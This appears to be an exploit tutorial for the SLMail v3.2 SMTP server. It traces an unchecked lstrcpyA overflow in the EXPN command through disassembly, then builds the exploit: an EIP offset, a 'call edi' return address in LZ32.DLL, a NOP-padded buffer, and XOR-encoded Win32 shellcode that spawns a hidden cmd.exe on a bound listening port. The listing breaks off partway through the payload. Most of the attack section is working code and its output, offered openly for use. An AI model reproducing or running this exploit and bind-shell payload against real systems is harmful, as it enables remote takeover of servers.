+004436F8 dword_4436F8    dd 443A98h              ; DATA XREF: sub_404390+24r
+004436F8                                         ; sub_404390+34o
+004436FC                 db    3 ;  
+004436FD                 db    0 ;  
+004436FE                 db    0 ;  
+004436FF                 db    0 ;  
+00443700                 db  94h ; "
+00443701                 db  3Ah ; :
+00443702                 db  44h ; D
+00443703                 db    0 ;  
+00443704                 db  0Ah ;  
+00443705                 db    0 ;  
+00443706                 db    0 ;  
+00443707                 db    0 ;  
+00443708                 db  90h ; 
+00443709                 db  3Ah ; :
+0044370A                 db  44h ; D
+0044370B                 db    0 ;  
+0044370C                 db    1 ;  
+0044370D                 db    0 ;  
+0044370E                 db    0 ;  
+0044370F                 db    0 ;  
+
+...<snip>
+
+004437E8                 db 0F0h ; 
+004437E9                 db  39h ; 9
+004437EA                 db  44h ; D
+004437EB                 db    0 ;  
+004437EC                 db  19h ;  
+004437ED                 db    0 ;  
+004437EE                 db    0 ;  
+004437EF                 db    0 ;  
+
+
+There's no point showing the complete table here, now.. take a look at its
+structure.
+
+
+<pointer to string> <dword> <pointer to string> <dword> etc
+
+
+My best guess here is that the dword value following each pointer will be the
+value assigned after a successful comparison. Let's check our theory.  Also we
+should note down our value after the pointer to "EXPN" : 004439f0h, 00000019h. 
+
+0x19, we'll keep that in mind.
+
+Scroll up and at the top of the table you see:
+
+
+004436F8 dword_4436F8    dd 443A98h              ; DATA XREF: sub_404390+24r
+004436F8                                         ; sub_404390+34o
+
+
+You can see to the right where the table is referenced, so click on the
+subroutine and we'll land straight into the call.
+
+
+004043B4 loc_4043B4:                             ; CODE XREF: sub_404390+11j
+004043B4                 mov     ecx, dword_4436F8
+004043BA                 test    ecx, ecx
+004043BC                 jz      short loc_4043F3 
+004043BE                 mov     ebp, ds:lstrlenA
+004043C4                 mov     esi, offset dword_4436F8
+
+
+Our table loaded at esi, ebp contains the address of lstrlenA.
+
+
+004043C9 
+004043C9 loc_4043C9:                             ; CODE XREF: sub_404390+61j
+004043C9                 test    eax, eax
+004043CB                 jnz     short loc_4043F3
+004043CD                 mov     eax, [esi]
+004043CF                 push    eax
+004043D0                 call    ebp
+
+
+Here we go, the string first moved to eax and then a string length function
+called.
+
+
+004043D2                 mov     ecx, [esi]
+004043D4                 push    eax
+004043D5                 push    ecx
+004043D6                 push    ebx
+004043D7                 call    j_lstrncmpi
+004043DC                 neg     eax
+004043DE                 sbb     eax, eax
+004043E0                 inc     eax
+004043E1                 jz      short loc_4043E9
+
+
+Now we know that the parameters for lstrncmpi are as follows:
+
+strncmpi(first_string, second_string, number_of_chars);
+
+The first parameter pushed on the stack is the return from the string length
+function, ecx is then pushed which points to the string, and finally ebx.
+So we can determine from this that ebx contains the input from the user.
+I can see that some of you may be a little puzzled here, yes - parameters
+are pushed on to the stack in reverse order.
+
+
+004043E3                 xor     edi, edi
+004043E5                 mov     di, [esi+4]
+
+
+Ah, just as we suspected.. if there is a successful comparison then di is
+loaded with the value that followed our pointer.
+
+
+004043E9 
+004043E9 loc_4043E9:                             ; CODE XREF: sub_404390+51j
+004043E9                 mov     ecx, [esi+8]
+004043EC                 add     esi, 8
+004043EF                 test    ecx, ecx
+004043F1                 jnz     short loc_4043C9
+
+loop :)
+
+004043F3 
+004043F3 loc_4043F3:                             ; CODE XREF: sub_404390+18j
+004043F3                                         ; sub_404390+2Cj ...
+004043F3                 mov     eax, edi       
+004043F5                 pop     edi
+004043F6                 pop     esi
+004043F7                 pop     ebp
+004043F8                 pop     ebx
+004043F9                 retn    
+004043F9 sub_404390      endp ; sp = -10h
+004043F9 
+
+
+And finally eax holds our value, and we return from the call.  Let's continue.
+
+
+00405EC7                 mov     edx, [esp+2Ch+arg_8]
+00405ECB                 mov     ebx, eax
+00405ECD                 mov     eax, [esp+2Ch+arg_4]
+00405ED1                 push    edx
+00405ED2                 push    eax
+00405ED3                 push    esi
+00405ED4                 lea     ecx, [esp+3Ch]
+00405ED8                 push    edi
+00405ED9                 push    ecx
+00405EDA                 push    ebx
+00405EDB                 call    sub_404850
+
+
+Now, the important things to take note of here is edx gets our inputted
+string, and ebx is given our value from the table (0x19).  Remember the
+order in which our registers were pushed, so we will be able to tell what
+is being referenced from the stack - and in the next call we will rename
+the stack variables to make it easier on ourselves.
+
+Note: I'm not taking advantage of some of the GREAT features IDA possesses
+- repeatable comments, labels and much more.  A necessity while on a real
+reversing journey.
+
+
+00404850 sub_404850      proc near               ; CODE XREF: sub_405330+73p
+00404850                                         ; sub_405560+73p ...
+00404850 
+00404850 var_270         = byte ptr -270h
+00404850 var_26C         = dword ptr -26Ch
+00404850 var_268         = byte ptr -268h
+00404850 var_264         = byte ptr -264h
+00404850 var_23C         = byte ptr -23Ch
+00404850 var_230         = byte ptr -230h
+00404850 var_168         = byte ptr -168h
+00404850 var_110         = byte ptr -110h
+00404850 var_105         = byte ptr -105h
+00404850 var_104         = byte ptr -104h
+00404850 var_10          = dword ptr -10h
+00404850 var_4           = dword ptr -4
+00404850 our_val         = dword ptr  4
+00404850 arg_4           = dword ptr  8
+00404850 arg_8           = dword ptr  0Ch
+00404850 arg_C           = dword ptr  10h
+00404850 arg_10          = dword ptr  14h
+00404850 our_input       = dword ptr  18h
+00404850 
+00404850                 mov     ecx, [esp+our_val]
+00404854                 sub     esp, 26Ch
+0040485A                 xor     eax, eax
+0040485C                 cmp     ecx, 8
+0040485F                 push    ebx
+00404860                 push    ebp
+00404861                 push    esi
+00404862                 push    edi
+00404863                 jnz     loc_4048E9
+
+
+We rename the useful stack arguments to something easier to remember,
+arg_0 = our_val, and arg_14 = our_input - if you're lost go back and take
+another look at the order the registers were pushed.
+
+ecx is loaded with our 0x19 value.  It is then compared to 8, which is not
+us, so we'll follow the jump.
+
+
+004048E9 
+004048E9 loc_4048E9:                             ; CODE XREF: sub_404850+13j
+004048E9                 cmp     ecx, 17h
+004048EC                 jnz     short loc_40495A
+004048EE                 mov     ecx, [esp+27Ch+arg_10]
+004048F5                 mov     esi, [esp+27Ch+arg_C]
+004048FC                 mov     eax, [ecx]
+004048FE                 cmp     eax, 8
+00404901                 jnz     short loc_404914
+00404903                 mov     ecx, [esi+100h]
+00404909                 test    ecx, ecx
+0040490B                 jz      short loc_404914
+0040490D                 mov     ebx, 1
+00404912                 jmp     short loc_404916
+
+
+A comparison to 17h, again.. not us, so we continue to follow the jumps until
+we reach...
+
+
+00404B7F loc_404B7F:                             ; CODE XREF: sub_404850+1C0j
+00404B7F                 cmp     ecx, 19h
+00404B82                 jnz     loc_404D7F
+00404B88                 mov     eax, dword_457354
+00404B8D                 test    eax, eax
+00404B8F                 jz      loc_404D4F
+00404B95                 mov     eax, dword_457384
+00404B9A                 mov     edi, [esp+27Ch+our_input]
+00404BA1                 push    0
+00404BA3                 push    eax
+00404BA4                 push    edi
+00404BA5                 call    sub_4365A0
+
+
+And here's our boy, note how our variables we renamed follow all through
+the call, IDA rocks doesn't it? :)
+
+So edi gets our string input, and we follow yet another call - again we'll
+rename the useful stack variable upon entering the next call.
+i.e.: edi = arg_0 = our_input
+
+
+004365A0 sub_4365A0      proc near               ; CODE XREF: sub_4029D0+92p
+004365A0                                         ; sub_4029D0+107p ...
+004365A0 
+004365A0 var_12C         = byte ptr -12Ch
+004365A0 var_12B         = byte ptr -12Bh
+004365A0 our_input       = dword ptr  4
+004365A0 arg_4           = dword ptr  8
+004365A0 arg_8           = dword ptr  0Ch
+004365A0 
+004365A0                 mov     eax, [esp+arg_8]
+004365A4                 mov     ecx, [esp+arg_4]
+004365A8                 sub     esp, 12Ch
+004365AE                 lea     edx, [esp+12Ch+var_12C]
+004365B2                 push    0
+004365B4                 push    eax
+004365B5                 mov     eax, [esp+134h+our_input]
+004365BC                 push    ecx
+004365BD                 push    12Ch
+004365C2                 push    edx
+004365C3                 push    eax
+004365C4                 call    sub_4364A0
+
+
+And yet another call, again take notice of the order in which the registers
+were pushed, eax=arg_0=our_input.  I have a feeling we are getting closer
+to the goods.
+
+Ok, I admit it. I peeked.
+
+
+004364A0 sub_4364A0      proc near               ; CODE XREF: sub_436470+1Bp
+004364A0                                         ; sub_4365A0+24p ...
+004364A0 
+004364A0 var_98          = byte ptr -98h
+004364A0 var_8C          = byte ptr -8Ch
+004364A0 var_78          = byte ptr -78h
+004364A0 var_6C          = byte ptr -6Ch
+004364A0 var_35          = byte ptr -35h
+004364A0 var_15          = byte ptr -15h
+004364A0 var_8           = dword ptr -8
+004364A0 var_4           = dword ptr -4
+004364A0 our_input       = dword ptr  4
+004364A0 arg_4           = dword ptr  8
+004364A0 
+004364A0                 mov     eax, [esp+our_input]
+004364A4                 sub     esp, 64h
+004364A7                 push    ebx
+004364A8                 push    ebp
+004364A9                 push    esi
+004364AA                 mov     esi, [esp+70h+arg_4]
+004364AE                 push    edi
+004364AF                 push    eax
+004364B0                 push    esi
+004364B1                 call    ds:lstrcpyA
+004364B7                 push    40h
+004364B9                 push    esi
+004364BA                 call    j_lstrchr
+004364BF                 test    eax, eax
+004364C1                 jz      short loc_4364C6
+004364C3                 mov     byte ptr [eax], 0
+
+
+And here we have it, the classic screw-up.  esi points to the buffer, eax
+has our string - *bang* strcpy.
+
+Did anyone out there notice any form of bounds checking up to this point?
+I sure didn't.
+
+Please guys, do not try to hide from us - we CAN see what you do.
+
+Now we know EXPN is our sure-fire victim.  Feel free to follow some of the
+other commands, you will run into similar coding practice, Seattle Labs
+have a lot to clean up.
+
+From a relatively quick reversing session, we find a common mistake - yet
+a mistake that compromises the entire server.
+
+Now, obviously, a lot of sessions won't be as straight forward - wait for
+a rainy day, have an extra packet of cigarettes on hand, a bottle of vodka,
+crank some 30footFALL and get hacking - patience is a virtue, take your time
+and navigate the code, you'll be amazed at what you find.
+
+And hey, even if you come up empty, by the time you've downed that bottle you
+won't care anyway.
+
+With enough patience and determination, you will find a barrage of different
+holes and vulnerabilities through disassembly techniques.  It is an asset
+worth having.
+
+
+Section 2: The Exploit.
+~~~~~~~~~~~~~~~~~~~~~~~
+
+Although this section will cover some tricks, techniques and the process
+of exploiting overflows in Windows, the main purpose of this section is to
+document what I consider the most ideal shellcode available for Win32
+exploits at this time.
+
+The last thing I want to do is go over already covered ground - none the
+less, I will document the route I took personally before creating the
+payload.  To those of you who have done this sort of thing before, feel
+free to skip straight to the shellcode.
+
+Before we begin, I just have something to say quickly regarding some members
+of the security community.
+
+When I released the IIS exploit (the definition of proof of concept :)),
+some of the mail was rather unsettling.
+
+Mail from employees of large corporations and yes, government agencies,
+bearing titles such as 'Head of Network Security' and similar who were
+using the exploit to determine the risk to their servers.  If the exploit
+failed, some were prepared to class the risk as minimal.
+
+Do not determine the threat to your servers solely on the results of one
+public exploit - the vulnerability exists, fix it.  If you think that was
+the only demonstration code floating around you need your head examined.
+
+Hopefully now, you may change your attitude.  The masses now have full
+control, without fail.
+
+Here we go.
+
+My experience with NT is rather limited, in fact, I've only recently made
+the move from spelunking Windows 9x.
+
+Unfortunately what I've noticed under NT is SoftIce has a bit of trouble
+trapping faults, and other debuggers tend to break in after the exception
+handling has kicked in.
+
+This sucks for a couple of reasons.
+
+If an exception is raised after a string length routine tries to read from
+invalid memory for example, under NT its quite likely that it'll be the
+exception handler itself that overwrites eip with your data (IIS comes to
+mind again).
+
+We can route our eip to an offset at that point if we wish, but it isn't
+particularly delicate, we'd be much better off to try and throw in some
+valid addresses and let the code ret to an eip with our data.
+
+What I suggest is setting a breakpoint on the exception dispatcher and
+dumping the eip it was called from.. 
+
+e.g.: bpx KiUserExceptionDispatcher DO "dd *esp+0c"
+
+Now if eip hasn't been overwritten you can break at that offset and see
+what you have to play with, if eip has been taken then the offset at that 
+location should be your bytes.
+
+In that case you can either try and trace back into the blown stack and
+find a location to break on relatively close to where we ret to our eip,
+or just take an educated guess.
+
+The latter is the path we'll take.
+
+Let's break this thing.
+
+attica:~> telnet 192.168.10.3 8376
+Trying 192.168.10.3...
+Connected to 192.168.10.3.
+Escape character is '^]'.
+220 supermax.gen.nz Smtp Server SLMail v3.2 Ready ESMTP spoken here
+expn xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+Our debugger breaks in, obviously in this case eip has been totally
+taken, look at where the handler was called - 0x78787878, i.e.: xxxx.
+
+Ok, now we want to find the exact point in the code where we return to our
+address - let's take a look at the disassembly.
+
+
+004364AF                 push    eax
+004364B0                 push    esi
+004364B1                 call    ds:lstrcpyA
+
+
+Let's set a breakpoint just above the call to lstrcpy, that way we can also
+have a closer look at the buffer manipulation and we should be mere footsteps
+away from total system control.
+
+Ok, send the data and let your debugger kick in, ret out of the call and
+you'll quickly reach..
+
+
+or	eax, -01
+add	esp, 0000012c
+ret
+
+
+That's where we wanna be, that ret will drop us to our eip.  We have control.
+
+Now, to go somewhere useful.
+
+Let's examine the registers and see what we have to play with, esp is totaled
+and points somewhere around the middle of our buffer.  So we could jump the
+stack, but why bother?  Take a look at some of those other registers - edi
+has our buffer directly after the "expn".  We couldn't have asked for
+anything better.  Although there are a fair few different ways to jump the
+stack, we'll almost always find a "call edi" or similar.
+
+Let's think about this for a moment, in a perfect world we'd just reference
+an offset in slmail.exe - but this is the world of Windows.
+
+We have to avoid null bytes so unfortunately we can't use the exe itself, as
+it is loaded at the default base address of 0x00400000.  We could use a
+location in the executable if we were to place our offset at the end of our
+data, as we'd have the null at the end of the string, but that doesn't leave
+us with enough space for a decent payload.  Remember we don't want this to be
+dependent on the version of NT at all, so we either need to use a DLL included
+with SLMail or an external DLL that is static on all service packs.
+
+So let's take a look at what else has been loaded from that process.
+SysInternals (http://www.sysinternals.com) have a handy little util called
+listdlls which will show you just that.
+
+
+C:\tools>listdlls slmail.exe
+
+ListDLLs V2.1
+Copyright (C) 1997-1999 Mark Russinovich
+http://www.sysinternals.com
+
+------------------------------------------------------------------------------
+slmail.exe pid: 159
+  Base        Size      Version         Path
+  0x00400000  0x62000   3.02.0001.1204  E:\PROGRA~1\SLmail\slmail.exe
+  0x77f60000  0x5c000   4.00.1381.0130  E:\WINNT\System32\ntdll.dll
+  0x10000000  0xc000    2.03.0000.0000  E:\WINNT\system32\OpenC32.dll
+  0x77f00000  0x5e000   4.00.1381.0133  E:\WINNT\system32\KERNEL32.dll
+  0x77ed0000  0x2c000   4.00.1381.0115  E:\WINNT\system32\GDI32.dll
+  0x77e70000  0x54000   4.00.1381.0133  E:\WINNT\system32\USER32.dll
+  0x77dc0000  0x3f000   4.00.1381.0121  E:\WINNT\system32\ADVAPI32.dll
+  0x77e10000  0x57000   4.00.1381.0131  E:\WINNT\system32\RPCRT4.dll
+  0x77d80000  0x32000   4.00.1381.0027  E:\WINNT\system32\comdlg32.dll
+  0x77c40000  0x13c000  4.00.1381.0114  E:\WINNT\system32\SHELL32.dll
+  0x77aa0000  0x74000   4.72.3609.2200  E:\WINNT\system32\COMCTL32.dll
+  0x776d0000  0x8000    4.00.1381.0131  E:\WINNT\system32\WSOCK32.dll
+  0x776b0000  0x14000   4.00.1381.0133  E:\WINNT\system32\WS2_32.dll
+  0x78000000  0x40000   6.00.8337.0000  E:\WINNT\system32\MSVCRT.dll
+  0x776a0000  0x7000    4.00.1381.0031  E:\WINNT\system32\WS2HELP.dll
+  0x77a90000  0xb000    4.00.1371.0001  E:\WINNT\system32\VERSION.dll
+  0x779c0000  0x8000    4.00.1371.0001  E:\WINNT\system32\LZ32.dll
+  0x77bf0000  0x7000    4.00.1381.0072  E:\WINNT\system32\rpcltc1.dll
+  0x77660000  0xf000    4.00.1381.0037  E:\WINNT\system32\msafd.dll
+  0x77690000  0x9000    4.00.1381.0037  E:\WINNT\System32\wshtcpip.dll
+  0x74ff0000  0xd000    4.00.1381.0131  E:\WINNT\System32\rnr20.dll
+
+
+There's not much loaded there in the way of its own DLL's, so we'll have to
+pick something external.  LZ32.DLL will do, static on all service packs,
+has the code we need and the offset has no null bytes.
+ 
+We find at location 0x779C1CAA we have a "call edi", that'll do nicely.
+
+The next problem - we need to know where in our buffer to stuff our offset.
+A quick and easy way to find this out is to fill your buffer with a heap
+of independent bytes, 1A, 2A, 3A, 4A....A1, A2 and so on, and you'll be
+able to pinpoint the location when eip is overwritten.
+
+Quickly we notice that the location we need is about 300 bytes into our buffer,
+so we have:
+
+expn <299 nops> 0x779c1caa
+
+So in its current form, if we were to send that data, eip would return to the
+offset 0x779c1caa which would call edi and execute our nops - before the offset
+we will also add in a short jump to bypass the garbage instructions that our
+offset was translated to.
+
+Now all that remains is to tack our payload on to the end.
+
+It's time. 
+
+
+The Payload.
+~~~~~~~~~~~~
+
+Note: the ideas for the string table/jump table came from DilDog, very cool.
+Amazing work you do.
+
+The goal:
+
+An exploit that spawns a command prompt directly on a specified port, and will
+execute successfully on all NT versions. 
+
+Considerations:
+
+- We are unsure of the exact OS version.
+- Function locations will differ depending on versions/service packs/upgrades.
+- The import table for SLMail does not have all needed functions.
+- We must avoid null bytes, carriage returns etc.
+
+We can take care of the first three problems by linking to the IAT of slmail,
+and using those procedures to load external functions.  As for the fourth?
+We'll just have to be clever.
+
+In order for me to keep the shellcode as generic as possible, we will create a
+jump table of all external functions we will be using, without relying on
+SLMails imports - with two exceptions.
+
+For us to be able to load DLL's and retrieve the addresses for needed
+procedures we will need to reference two functions from the import table
+of slmail.exe:
+
+GetProcAddress and LoadLibraryA.
+
+Before I show the table we create, I want to give a brief rundown on what's
+involved when spawning a remote shell under Windows NT.  Unfortunately it
+is not anywhere near as straight forward as when you're working with *nix,
+but, of course, it's do-able.  To be able to spawn a full-blown remote
+shell, we need to be able to redirect standard output and standard error
+to the connected user, and the connected user must have control over
+standard input.
+
+The answer?
+
+Anonymous Pipes.
+
+The primary use for anonymous pipes is to exchange data between
+parent/child processes, or just between child processes.
+
+The anonymous pipe is a one-way pipe - the data will flow in one
+direction - from one end, to the other.  The usefulness is apparent when
+we are working with the console, as we can replace the handles of
+stdin/stdout/stderr with handles to the ends of the created pipes.  We can
+then read and write to the pipes with the Read and Writefile API's.  From
+the read end of the stdout pipe, we send the buffer to the connected socket
+and subsequently what we receive from the connected socket we fire off to
+the write end of the stdin pipe.
+
+To keep it generic our string table is unfortunately going to have to include
+a fair few functions, all taking up precious bytes.  When you are strapped
+for stack space you'll want to make use of more functions from your targets
+IAT.
+
+
+The table:
+
+        db "KERNEL32",0	;string to push for LoadLibrary.
+	db "CreatePipe",0
+	db "GetStartupInfoA",0  
+
+;we will modify the start-up structure at runtime as the structure is far
+;too large to include in the shellcode.
+	
+	db "CreateProcessA",0
+	db "PeekNamedPipe",0
+	db "GlobalAlloc",0
+	db "WriteFile",0
+	db "ReadFile",0
+	db "Sleep",0
+	db "ExitProcess",0
+	
+	db "WSOCK32",0
+	db "socket",0
+	db "bind",0
+	db "listen",0
+	db "accept",0
+	db "send",0
+	db "recv",0
+
+sockstruc STRUCT
+	sin_family dw 0002h
+	sin_port   dw ?
+	sin_addr   dd ?
+	sin_zero   db 8 dup (0)
+sockstruc ENDS
+
+;the sin_port word value will be filled by the exploit client before the
+;shellcode is sent.	
+	
+	db "cmd.exe",0
+	dd 0ffffffffh
+	db 00dh, 00ah
+
+;the string to push to invoke the command prompt. 
+;the dword at the end will be used to reference the end of the string table 
+;at runtime.
+
+
+Now, I know what you're thinking - all those strings are null-terminated,
+and the structures contain null bytes.  To get around this, we will XOR
+the string table with 0x99, except for the carriage, linefeed, and the
+0xFFFFFFFF dword.
+
+If all went to plan, your encrypted table should look a little something
+like this:
+
+
+00000280  .. .. .. .. .. .. .. .. .. .. .. D2 DC CB D7 DC              .....
+00000290  D5 AA AB 99 DA EB FC F8-ED FC C9 F0 E9 FC 99 DE   ................
+000002A0  FC ED CA ED F8 EB ED EC-E9 D0 F7 FF F6 D8 99 DA   ................
+000002B0  EB FC F8 ED FC C9 EB F6-FA FC EA EA D8 99 DA F5   ................
+000002C0  F6 EA FC D1 F8 F7 FD F5-FC 99 C9 FC FC F2 D7 F8   ................
+000002D0  F4 FC FD C9 F0 E9 FC 99-DE F5 F6 FB F8 F5 D8 F5   ................
+000002E0  F5 F6 FA 99 CE EB F0 ED-FC DF F0 F5 FC 99 CB FC   ................
+000002F0  F8 FD DF F0 F5 FC 99 CA-F5 FC FC E9 99 DC E1 F0   ................
+00000300  ED C9 EB F6 FA FC EA EA-99 CE CA D6 DA D2 AA AB   ................
+00000310  99 EA F6 FA F2 FC ED 99-FB F0 F7 FD 99 F5 F0 EA   ................
+00000320  ED FC F7 99 F8 FA FA FC-E9 ED 99 EA FC F7 FD 99   ................
+00000330  EB FC FA EF 99 9B 99 82-A1 99 99 99 99 99 99 99   ................
+00000340  99 99 99 99 99 FA F4 FD-B7 FC E1 FC 99 FF FF FF   ................
+00000350  FF 0D 0A                                          ...
+
+
+This will be tacked on to the very end of our shellcode.
+
+Now it is time to get to the good stuff.
+
+Note: this exploit assumes a base address of 0x00400000
+
+The recommended way to follow this is to step over the code in your
+debugger while reading the explanations.
+
+
+:00000138 33C0                    xor eax, eax
+:0000013A 50                      push eax
+:0000013B F7D0                    not eax
+:0000013D 50                      push eax
+:0000013E 59                      pop ecx
+:0000013F F2                      repnz
+:00000140 AF                      scasd
+:00000141 59                      pop ecx
+:00000142 B1C6                    mov cl, C6
+:00000144 8BC7                    mov eax, edi
+:00000146 48                      dec eax
+:00000147 803099                  xor byte ptr [eax], 99
+:0000014A E2FA                    loop 00000146
+
+
+This sets edi to the end of our encrypted string table by scanning the buffer
+for our dword (0xFFFFFFFF), ecx holds the amount of characters to decrypt.
+edi is then moved to eax, and each byte is decrypted (XORed with 0x99).  eax
+now points to the beginning of the string table.
+
+
+:0000014C 33F6                    xor esi, esi
+:0000014E 96                      xchg eax,esi
+:0000014F BB99101144              mov ebx, 44111099
+:00000154 C1EB08                  shr ebx, 08
+:00000157 56                      push esi
+:00000158 FF13                    call dword ptr [ebx]
+
+
+Here we make a call to LoadLibraryA, pushing esi as the parameter - which
+points to "KERNEL32", the first string of the table.  The call is made by
+giving ebx the location of LoadLibrary from SLMails import table, and we
+tack on an extra byte to avoid the use of a null character.  We then kill
+it by shifting the value right one byte.  LoadLibraryA = 00441110h
+
+
+:0000015A 8BD0                    mov edx, eax
+:0000015C FC                      cld
+:0000015D 33C9                    xor ecx, ecx
+:0000015F B10B                    mov cl, 0B
+:00000161 49                      dec ecx
+:00000162 32C0                    xor al, al
+:00000164 AC                      lodsb
+:00000165 84C0                    test al, al
+:00000167 75F9                    jne 00000162
+
+
+We give ecx the amount of procedures we have specified from the kernel, as
+we will be creating a jump table for our functions.  Then we just increment
+esi until we reach a null byte - moving to the next string name.
+
+
+:00000169 52                      push edx
+:0000016A 51                      push ecx
+:0000016B 56                      push esi
+:0000016C 52                      push edx
+:0000016D B30C                    mov bl, 0C
+:0000016F FF13                    call dword ptr [ebx]
+:00000171 AB                      stosd
+:00000172 59                      pop ecx
+:00000173 5A                      pop edx
+:00000174 E2EC                    loop 00000162
+
+
+Here we call GetProcAddress, ebx already had the value from LoadLibrary, so we
+only need to modify the low byte.  We then store the address at edi, and loop
+for the rest of the functions.  We now have a jump table at edi - we can now
+call each function indirectly from edi.  e.g.: call dword ptr [edi-0c].
+ 
+
+:00000176 32C0                    xor al, al
+:00000178 AC                      lodsb
+:00000179 84C0                    test al, al
+:0000017B 75F9                    jne 00000176
+:0000017D B310                    mov bl, 10
+:0000017F 56                      push esi
+:00000180 FF13                    call dword ptr [ebx]
+:00000182 8BD0                    mov edx, eax
+:00000184 FC                      cld
+:00000185 33C9                    xor ecx, ecx
+:00000187 B106                    mov cl, 06
+:00000189 32C0                    xor al, al
+:0000018B AC                      lodsb
+:0000018C 84C0                    test al, al
+:0000018E 75F9                    jne 00000189
+:00000190 52                      push edx
+:00000191 51                      push ecx
+:00000192 56                      push esi
+:00000193 52                      push edx
+:00000194 B30C                    mov bl, 0C
+:00000196 FF13                    call dword ptr [ebx]
+:00000198 AB                      stosd
+:00000199 59                      pop ecx
+:0000019A 5A                      pop edx
+:0000019B E2EC                    loop 00000189
+
+
+This is just a repeat of the earlier code, except now we are extending our
+jump table to include the socket functions.
+
+
+:0000019D 83C605                  add esi, 00000005
+:000001A0 33C0                    xor eax, eax
+:000001A2 50                      push eax
+:000001A3 40                      inc eax
+:000001A4 50                      push eax
+:000001A5 40                      inc eax
+:000001A6 50                      push eax
+:000001A7 FF57E8                  call [edi-18]
+:000001AA 93                      xchg eax,ebx
+
+
+Here we push the values SOCK_STREAM, AF_INET, and null for the protocol.  We
+then call the 'socket' function.
+
+Note: We don't need to call WSAStartup as the target process has taken care of
+that for us
+
+We also set esi to point to the socket structure, and we store the return
+value from the socket procedure in ebx so it won't be destroyed by following
+functions.
+
+
+:000001AB 6A10                    push 00000010
+:000001AD 56                      push esi
+:000001AE 53                      push ebx
+:000001AF FF57EC                  call [edi-14]
+
+
+This just makes a call to bind, pushing our socket handle and the socket
+structure as parameters.
+
+
+:000001B2 6A02                    push 00000002
+:000001B4 53                      push ebx
+:000001B5 FF57F0                  call [edi-10]
+
+
+Now we call listen, socket handle as the parameter.
+
+
+:000001B8 33C0                    xor eax, eax
+:000001BA 57                      push edi
+:000001BB 50                      push eax
+:000001BC B00C                    mov al, 0C
+:000001BE AB                      stosd
+:000001BF 58                      pop eax
+:000001C0 AB                      stosd
+:000001C1 40                      inc eax
+:000001C2 AB                      stosd
+:000001C3 5F                      pop edi
+:000001C4 48                      dec eax
+:000001C5 50                      push eax
+:000001C6 57                      push edi
+:000001C7 56                      push esi
+:000001C8 AD                      lodsd
+:000001C9 56                      push esi
+:000001CA FF57C0                  call [edi-40]
+
+
+Now we make our first call to CreatePipe, we create our SECURITY_ATTRIBUTES
+structure at edi, and specify that the returned handles are inheritable.  esi
+receives our read and write handles returned from the call.
+
+
+:000001CD 48                      dec eax
+:000001CE 50                      push eax
+:000001CF 57                      push edi
+:000001D0 AD                      lodsd
+:000001D1 56                      push esi
+:000001D2 AD                      lodsd
+:000001D3 56                      push esi
+:000001D4 FF57C0                  call [edi-40]
+
+
+Our second call to CreatePipe, again our read and write handles are stored at
+esi.
+
+
+:000001D7 48                      dec eax
+:000001D8 B044                    mov al, 44
+:000001DA 8907                    mov dword ptr [edi], eax
+:000001DC 57                      push edi
+:000001DD FF57C4                  call [edi-3C]
+
+
+We make a call to GetStartupInfo, the structure will be stored at edi which we
+give the size value.  The structure will need to be modified.
+
+
+:000001E0 33C0                    xor eax, eax
+:000001E2 8B46F4                  mov eax, dword ptr [esi-0C]
+:000001E5 89473C                  mov dword ptr [edi+3C], eax
+:000001E8 894740                  mov dword ptr [edi+40], eax
+:000001EB 8B06                    mov eax, dword ptr [esi]
+:000001ED 894738                  mov dword ptr [edi+38], eax
+:000001F0 33C0                    xor eax, eax
+:000001F2 66B80101                mov ax, 0101
+:000001F6 89472C                  mov dword ptr [edi+2C], eax
+:000001F9 57                      push edi
+:000001FA 57                      push edi
+:000001FB 33C0                    xor eax, eax
+:000001FD 50                      push eax
+:000001FE 50                      push eax
+:000001FF 50                      push eax
+:00000200 40                      inc eax
+:00000201 50                      push eax
+:00000202 48                      dec eax
+:00000203 50                      push eax
+:00000204 50                      push eax
+:00000205 AD                      lodsd
+:00000206 56                      push esi
+:00000207 33C0                    xor eax, eax
+:00000209 50                      push eax
+:0000020A FF57C8                  call [edi-38]
+
+
+By all means feel free to improve this code to drop some bytes, for example,
+using stosd to modify edi. At the time I was just trying to make it _work_,
+and wasn't particularly worried about the size.  What the hell is going on
+here anyway?
+
+We are modifying the startupinfo structure before our call to CreateProcess.
+
+We replace StdOutput and StdError with the handle of the write end of our
+first created pipe.  We then replace StdInput with the read handle of our
+second created pipe.  The flags value we set to
+STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES, and we set the ShowWindow value
+to SW_HIDE.  esi points to "cmd.exe" and we make the call to CreateProcess.
+
+
+:0000020D FF76F0                  push [esi-10]
+:00000210 FF57CC                  call [edi-34]
+:00000213 FF76FC                  push [esi-04]
+:00000216 FF57CC                  call [edi-34]
+
+
+CloseHandle is called to close the first read and the second write handles we
+used for our StdHandles.
+
+
+:00000219 48                      dec eax
+:0000021A 50                      push eax
+:0000021B 50                      push eax
+:0000021C 53                      push ebx
+:0000021D FF57F4                  call [edi-0C]
+:00000220 8BD8                    mov ebx, eax
+
+
+Now we call accept and wait for a connection.  We store the returned handle in
+ebx.
+
+
+:00000222 33C0                    xor eax, eax
+:00000224 B404                    mov ah, 04
+:00000226 50                      push eax
+:00000227 C1E804                  shr eax, 04
+:0000022A 50                      push eax
+:0000022B FF57D4                  call [edi-2C]
+:0000022E 8BF0                    mov esi, eax
+
+
+Here we create a 1024 byte buffer with GlobalAlloc, pushing
